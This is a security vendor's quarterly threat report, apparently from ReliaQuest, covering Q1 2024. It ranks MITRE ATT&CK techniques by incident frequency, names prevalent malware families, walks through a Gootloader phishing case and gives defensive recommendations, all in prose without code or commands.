May 30 Webinar | SOC Talk: Automating Threat Response
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
May 14, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Key Points
The first quarter of 2024 (Q1 2024) witnessed a series of impactful cybersecurity events, including critical vulnerabilities affecting Ivanti, Citrix, Team City, and ScreenConnect. The ongoing evolution of threat actors continues, notably with the adoption of Python for persistence in the “SocGholish” malware, as reported by ReliaQuest. Additionally, the I-Soon data leak provided rare insight into the operations of a Chinese advanced persistent threat (APT) group, enhancing the cybersecurity community’s understanding of Chinese-state-sponsored actors. A law enforcement operation provided hope that the “LockBit” ransomware group would dissipate, but despite the initial takedown, the group resurfaced and continued its operations.
This Threat Spotlight report highlights growing trends, such as exploitation for initial access and adversaries’ continued use of defense evasion techniques to remain undetected. We provide security teams and executives with insights into attacker behaviors to improve their understanding of the threat landscape. Finally, we’ll provide curated, actionable recommendations to help counter these techniques
ReliaQuest analyzed a select group of true-positive customer incidents that had the potential to result in data breaches or theft (e.g., involving extortion, espionage, custom malware, hands-on-keyboard operations, commodity threats) categorized as “critical security incidents.” We aligned these incidents with the MITRE ATT&CK framework to identify trends and unique behaviors across the kill chain to provide an understanding of the threat landscape.
Phishing, Drive-by Compromise, and Exploitation Remain Top Techniques
Initial access involves an adversary attempting to gain a foothold in an organization’s network. The most common initial access technique, holding its top spot from the fourth quarter last year, was phishing with a malicious link (T1566.002), appearing in 27.2% of critical security incidents recorded by ReliaQuest. Dependent on the attack, the link will either download malware or lead targets to a website to capture credentials. In second place, also maintaining its spot from the fourth quarter of last year, was drive-by compromise (T1189), appearing in 25.7% of incidents. This technique relies on users downloading malware unknowingly from either attacker-owned infrastructure or a compromised legitimate website: Attackers target websites with high search engine rankings to increase their chances of successful malware download. Lastly, the exploitation of public-facing applications (T1190) held its third place spot from last quarter for initial access, turning up in 16.9% of incidents this quarter. This technique involves an adversary targeting a vulnerable, publicly accessible application such as a virtual private network (VPN) gateway and aligns with the frequency of critical vulnerabilities released this quarter.
Attackers Continue to Prefer PowerShell for Execution
After gaining initial access, adversaries then run code or commands on the compromised system. Windows Command Shell or cmd.exe (T1059.00) continues to lead as the top execution technique, accounting for 33.3% of incidents. The use of Windows Command line is common to execute malware or commands post-access for discovery purposes. The next most common execution technique this quarter was PowerShell (T1059.001), often used for malware installation, executing ingressed tools, or for hands-on-keyboard activity. PowerShell was used in 19.4% of observed incidents this quarter, moving up from the third spot in the fourth quarter of 2023. In third, we saw the execution of malicious files (T1204.002) in 11% of incidents, replacing the third-most common technique of Q4 2023, user execution: malicious link. Malicious files are commonly delivered in executable (.exe) or compressed (.zip) formats by a phishing email with an attachment, downloaded via drive-by compromise, or downloaded with a malicious link sent in a phishing email.
Scheduled Tasks Fall, Registry Keys, and Startup Folder Favored for Persistence
Altering Windows registry keys or adding malware to a startup folder (T1547.001) moved from second to first place this quarter among persistence methods, seen in 34.8% of incidents. In Q4 2023, attackers relied on valid domain accounts for persistence. But this quarter, attackers more commonly created accounts (T1136) after gaining access to an environment—their chosen tactic in 13.95% of incidents. Lastly, we observed a rise in the use of web shells (T1505.003) for persistence, observed in 11.63% of incidents. This technique is commonly employed following the exploitation of a web server, whether public-facing or internal.
Exploitation Tops for Privilege Escalation
Once they’ve established persistence, an adversary turns to privilege escalation. In the fourth quarter of last year, we most commonly observed the use of valid accounts or exploitation. Citrix Bleed (CVE-2023-4966) exploitation in particular was common—it occasionally granted higher privileges dependent on the target account. In the first quarter of this year, exploitation for privilege escalation (T1068) increased significantly, from 7.1% to 46.6% of incidents involving privilege escalation. This surge is likely due to the two vulnerabilities in ScreenConnect (CVE-2024-1709 and CVE-2024-1708) identified this quarter, which, upon successful exploitation, provided administrator credentials. Continuing from last quarter, we observed adversaries exploiting valid domain accounts (T1078.002) to escalate privileges in 20% of incidents. In Q1 2024, we observed an uptick in adversaries modifying the Setuid and Setgid bits (T1548.001), a technique used in 6.6% of incidents with privilege escalation observed. Setuid and Setgid bits are file permissions in Linux which can be exploited to execute commands with elevated privileges. The uptick in modifications of Setuid and Setgid bits is likely due to the increase of exploitation for initial access rising due to these devices using the Linux operating system.
Command Obfuscation and LNK Files Used for Defense Evasion
Defense evasion involves the adversary attempting to evade technical controls and detections. In the last quarter of 2023, we observed the use of command obfuscation and abuse of the Windows RunDLL32 utility as the top defense evasion techniques. Holding its top spot was command obfuscation (T1027.010) for defense evasion in 22.06% of incidents. Command obfuscation involves adding characters, strings, and encoding to malware or when executing commands. We then observed LNK icon smuggling (T1027.012) in 10.29% of incidents. Icon smuggling entails hiding the payload in the metadata of shortcut (.lnk) files. The execution of various malware families, such as Gootloader and Dorkbot, involved this behavior during either the initial or subsequent payload downloads. Lastly, we observed files being deleted (T1070.004) by adversaries to remove traces of the intrusion in 7.35% of incidents. This technique was most often used by malware to delete the initial file after successful installation, though we also observed this behavior occurring when an adversary has hands-on-keyboard access and manually deletes files to remove their tracks.
Exploitation for Credential Access Surpasses Keylogging
Credential access involves an adversary attempting to obtain sensitive account credentials. In the last quarter of 2023, the primary methods of credential access we observed were credential theft from password stores, keylogging, and security account manager (SAM) dumping. In Q1 2024, we primarily observed adversaries gaining access to credentials through exploitation (T1212) in 24% of incidents. Credential theft from password stores (T1555), such as web browsers or password managers, fell to the second spot and occurred in 16% of incidents, a tactic often seen in malware infection chains that exfiltrate stolen credentials. Surpassing SAM dumping, access to Linux password storage files “/etc/passwd” and “/etc/shadow” (T1003.008) was noted in 12% of incidents, enabling attackers to conduct password cracking to acquire credentials.
System and Process Discovery Rise in Adoption
Once an adversary gains access to the environment and establishes persistence, they need to identify information like current permissions and accessible remote systems. In Q4 of last year, the top discovery technique we observed was the execution of system owner commands. This quarter, however, system information (T1082) was the most common, deployed in 15.3% of incidents, unveiling details of the current system, including its version, patches, architecture, and more. A formerly less common technique also arose this quarter—the discovery of processes running on a system (T1057)—was observed in 12.8% of incidents, putting it in second place. This technique is common during malware execution to relay back to the attacker what applications are running on the system. Remaining in the third spot from last quarter, discovering domain accounts (T1087.002) occurred in 7.8% of incidents. This technique, often utilized with the Net utility on Windows operating systems, can uncover a list of domain accounts for subsequent attacks.
Internal Phishing and Remote Windows Utilities Abused for Lateral Movement
After gaining a foothold and discovering information about the environment, adversaries aim to compromise other systems to move laterally through the environment. In the last quarter of 2023, we saw attackers largely using server message block (SMB) shares for lateral movement, employing tools such as PsExec. This quarter, the most common technique we observed was internal spearphishing (T1534), in 17.6% of incidents. Surpassing lateral movement with tool transfer, remote desktop protocol (T1021.001) tied with Windows remote management (T1021.006) for the next most common technique at 11.7%. Both techniques exploit Windows utilities to remotely interact with and execute commands on systems.
ReliaQuest closely monitors the malware featured in all critical security incidents. SocGholish shot to the top spot in the first quarter of this year despite having been relatively uncommon in Q4 2023. SocGholish is delivered via drive-by compromise, masquerading as a fake browser update in the form of a malicious JavaScript file. Last quarter, the top spot was occupied by “AsyncRAT,” a remote access trojan, which now sits in second place. It is primarily distributed in phishing emails as an attachment. “Dorkbot” and “Gootloader” malware were tied for the next most prevalent malware families, surpassing SolarMarker, which was in third place last quarter. Dorkbot is typically introduced to devices via USB, and Gootloader is deployed when users click on phishing links.
To inflict pain on an attacker, slow them down as much as possible while maintaining detection and response capabilities. Having covered the most common adversary techniques, let’s discuss how to effectively hinder a threat actor’s efforts.
Consider technical controls as an addition to defense-in-depth—they serve to restrict the adversary’s abilities throughout their intended kill chain. For example, if SocGholish is successfully downloaded through drive-by compromise, implement a group policy that forces JavaScript files to open in Notepad instead of executing. This strategic move effectively blocks the adversary from gaining execution on the system. Below, we examine a case study to highlight the importance of utilizing technical controls and ensuring adequate visibility.
In February 2024, ReliaQuest responded to a detection triggered by obfuscated PowerShell executing in a customer environment.
In this incident, a user received a phishing email containing a Dropbox link. The user clicked the link and downloaded a file named “List of Required items and services.zip,” which contained the shortcut file “List of Required items and services.lnk”. When the user clicked the shortcut file, obfuscated PowerShell executed successfully on the host and downloaded the next stages of Gootloader, including a PDF file with an embedded payload loaded into a Visual Basic Script (VBS) file and executed. We observed the malware making successful outbound connections to its command-and-control (C2) infrastructure and establishing persistence. ReliaQuest quarantined the impacted host until the customer could restore it from a known good backup.
By mapping this incident to the MITRE ATT&CK framework, we observed the following techniques:
Initial Access
Execution
Persistence
Defense Evasion
Command and Control
Main Takeaways
Given the importance of technical controls and adequate visibility, we identified several recommendations to enhance your organization’s security posture.
Technical Controls
Visibility
ReliaQuest forecasts with high confidence that phishing and drive-by downloads will continue to be the primary techniques for initial access in the immediate future because commodity-based malware such as SocGholish relies on these methods for delivery. Financially motivated adversaries will keep exploiting vulnerabilities that provide initial access, capitalizing on the window of opportunity before organizations can implement mitigations or patches. For that reason, it’s important to add technical controls that counter initial access and hinder attackers’ abilities to execute code on systems. Implementing a defense-in-depth model is paramount in the event an adversary gains access to restrict their movements and provide visibility to respond.
ReliaQuest actively tracks threat actors’ tactics, techniques, and procedures (TTPs) to provide insights into trends and new behaviours. We use these observations to create custom detection rules to improve customers’ security posture.
Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization.